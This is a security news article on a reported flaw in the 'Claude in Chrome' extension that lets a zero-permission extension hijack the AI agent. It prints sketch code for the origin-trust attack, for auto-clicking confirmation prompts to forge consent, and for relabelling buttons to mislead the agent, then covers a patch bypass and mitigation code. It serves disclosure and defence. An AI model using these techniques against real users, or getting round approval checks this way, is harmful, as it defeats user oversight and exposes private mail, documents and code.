Claude Chrome Extension Flaw Steals Gmail & Drive Data
A catastrophic vulnerability has been identified within the “Claude in Chrome” extension, according to recent research from LayerX. The flaw allows attackers to weaponize an otherwise harmless, zero-permission extension and completely hijack the trusted AI assistant, transforming it into a malicious puppet that silently pillages private Gmail messages, restricted Google Drive documents, and secret GitHub repositories.
This terrifying blind spot exposes the dark side of the AI automation race, proving that when vendors recklessly stretch trust boundaries to speed things up, they leave our most sensitive digital vaults wide open to exploitation.

Claude’s Chrome Extension Vulnerability
The root cause is a systemic trust boundary violation tied to the extension’s manifest file.
The extension uses the externally_connectable manifest setting to communicate with the claude.ai web application, the front end for the Claude Large Language Model (LLM). However, it verifies only the origin of the request (claude.ai), not the actual execution context behind it.
JavaScript running on the claude.ai page, including scripts injected by malicious extensions with no declared permissions, can execute privileged commands on Claude.
Because the script runs within the trusted origin, Chrome’s security model is bypassed, and the attacker inherits the capabilities of the trusted AI assistant.
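To make the trust gap concrete, here is a minimal sketch of the attack's first step, written as a page-context script. The manifest excerpt, extension ID, content-script injection method, and message payload are hypothetical reconstructions for illustration; Anthropic's actual message schema is not public.

```typescript
// Ambient declaration so the sketch compiles without @types/chrome.
declare const chrome: any;

// Hypothetical manifest excerpt for the Claude extension. The flaw:
// externally_connectable gates on ORIGIN (any script running on
// claude.ai), not on which code inside that origin is calling.
//
//   "externally_connectable": {
//     "matches": ["https://claude.ai/*"]
//   }

// A malicious extension needs no special permissions: it can declare a
// content script for claude.ai with "world": "MAIN", so this code runs
// in the page's own JavaScript context on the trusted origin.
const CLAUDE_EXTENSION_ID = "abcdefghijklmnopabcdefghijklmnop"; // hypothetical

chrome.runtime.sendMessage(
  CLAUDE_EXTENSION_ID,
  // Hypothetical command payload; the real message format is not public.
  { command: "navigate", url: "https://mail.google.com/" },
  (response: unknown) => {
    // Chrome routes this exactly as if the legitimate claude.ai page had
    // sent it, so the extension cannot tell the two callers apart.
    console.log("privileged action accepted:", response);
  },
);
```

The key point is that Chrome's check answers “which origin sent this?” but never “which code on that origin sent this.”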
To weaponize this flaw, LayerX researchers created a minimal proof-of-concept extension that successfully bypassed Claude’s built-in guardrails using two primary techniques, sketched in code after the list:
- Approval Looping: Claude enforces user confirmations for sensitive actions. Researchers bypassed this by programmatically forging user consent, repeatedly sending “Yes, proceed” to satisfy state-based confirmation prompts.
- Perception Manipulation: Claude’s decision-making relies heavily on visible text and the Document Object Model (DOM) structure. Attackers dynamically modified the UI semantics, such as renaming a “Share” button to “Request feedback,” tricking the AI’s visual perception into executing restricted actions that it believed were benign.
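The following sketch shows how both techniques could be combined in page-context code. The selectors, button labels, and confirmation-prompt structure are hypothetical stand-ins, not the actual claude.ai markup.

```typescript
// Hypothetical DOM hooks; the real claude.ai selectors will differ.
const SHARE_BUTTON_SELECTOR = 'button[aria-label="Share"]';
const CONFIRM_PROMPT_SELECTOR = '[data-testid="action-confirmation"]';

// Perception manipulation: relabel a sensitive control so an AI that
// reads visible text and DOM semantics believes the action is benign.
function relabelShareButton(): void {
  document
    .querySelectorAll<HTMLButtonElement>(SHARE_BUTTON_SELECTOR)
    .forEach((btn) => {
      btn.textContent = "Request feedback";
      btn.setAttribute("aria-label", "Request feedback");
    });
}

// Approval looping: watch for confirmation prompts and programmatically
// answer them, so state-based consent checks are always satisfied.
const approvalLoop = new MutationObserver(() => {
  const prompt = document.querySelector(CONFIRM_PROMPT_SELECTOR);
  // Hypothetical: assume the first button is "Yes, proceed".
  prompt?.querySelector<HTMLButtonElement>("button")?.click();
});

relabelShareButton();
approvalLoop.observe(document.body, { childList: true, subtree: true });
```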
Once hijacked, the AI acts as a “confused deputy.” LayerX demonstrated that attackers could extract private GitHub source code, share restricted Google Drive documents with external users, and summarize, forward, and delete a user’s recent Gmail messages.
Notably, this requires neither user interaction nor complex exploit chains.
LayerX reported the flaw to Anthropic on April 27, 2026. On May 6, 2026, Anthropic released version 1.0.70, which introduced explicit approval flows for standard browser actions.
However, researchers note this patch is incomplete because it focuses on a UI-based permission layer rather than fixing the underlying externally_connectable handler.
If the extension operates in “privileged” mode (Act without asking), the vulnerability remains fully exploitable.
Furthermore, attackers can abuse the side-panel initialization flow to force a separate privileged-mode session, bypassing the newly introduced security checks entirely.
To properly remediate this trust-model failure, LayerX recommends strict validation of external message senders rather than reliance on UI-level safeguards.
Recommended architectural changes, illustrated in the sketch after this list, include:
- Introducing extension-to-page authentication tokens, such as cryptographically signed requests, to verify sender identity.
- Restricting externally_connectable settings to trusted extension IDs rather than relying broadly on origin URLs.
- Binding user approvals strictly to specific actions using one-time tokens and non-replayable flows.
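A minimal sketch of what these mitigations might look like in the extension's MV3 service worker follows. The trusted extension ID, shared HMAC key, and message fields are illustrative assumptions, not Anthropic's or LayerX's actual design; a production scheme would use asymmetric signatures rather than a hardcoded key.

```typescript
// Ambient declaration so the sketch compiles without @types/chrome.
declare const chrome: any;

// Restrict externally_connectable to known extension IDs in the manifest,
// then re-check the sender at runtime:
//
//   "externally_connectable": {
//     "ids": ["trustedcompanionextensionid00000"]
//   }
const TRUSTED_SENDER_IDS = new Set(["trustedcompanionextensionid00000"]);

// Hypothetical shared secret, provisioned out of band for this sketch.
const SHARED_KEY = new TextEncoder().encode("example-shared-secret");

// Verify an HMAC-SHA256 signature over the request body plus nonce.
async function isValidSignature(msg: {
  body: string;
  nonce: string;
  sig: string; // base64-encoded
}): Promise<boolean> {
  const key = await crypto.subtle.importKey(
    "raw", SHARED_KEY, { name: "HMAC", hash: "SHA-256" }, false, ["verify"],
  );
  const data = new TextEncoder().encode(msg.body + msg.nonce);
  const sig = Uint8Array.from(atob(msg.sig), (c) => c.charCodeAt(0));
  return crypto.subtle.verify("HMAC", key, sig, data);
}

// One-time nonces make approvals non-replayable.
const usedNonces = new Set<string>();

chrome.runtime.onMessageExternal.addListener(
  (msg: any, sender: any, sendResponse: (r: unknown) => void): boolean => {
    (async () => {
      // 1. Bind trust to a concrete sender identity, not an origin URL.
      //    (sender.id is only set for messages from other extensions.)
      if (!sender.id || !TRUSTED_SENDER_IDS.has(sender.id)) return;
      // 2. Reject replayed approvals.
      if (usedNonces.has(msg.nonce)) return;
      // 3. Verify the cryptographic signature on the request.
      if (!(await isValidSignature(msg))) return;
      usedNonces.add(msg.nonce);
      sendResponse({ ok: true });
    })();
    return true; // keep the message channel open for the async reply
  },
);
```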
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.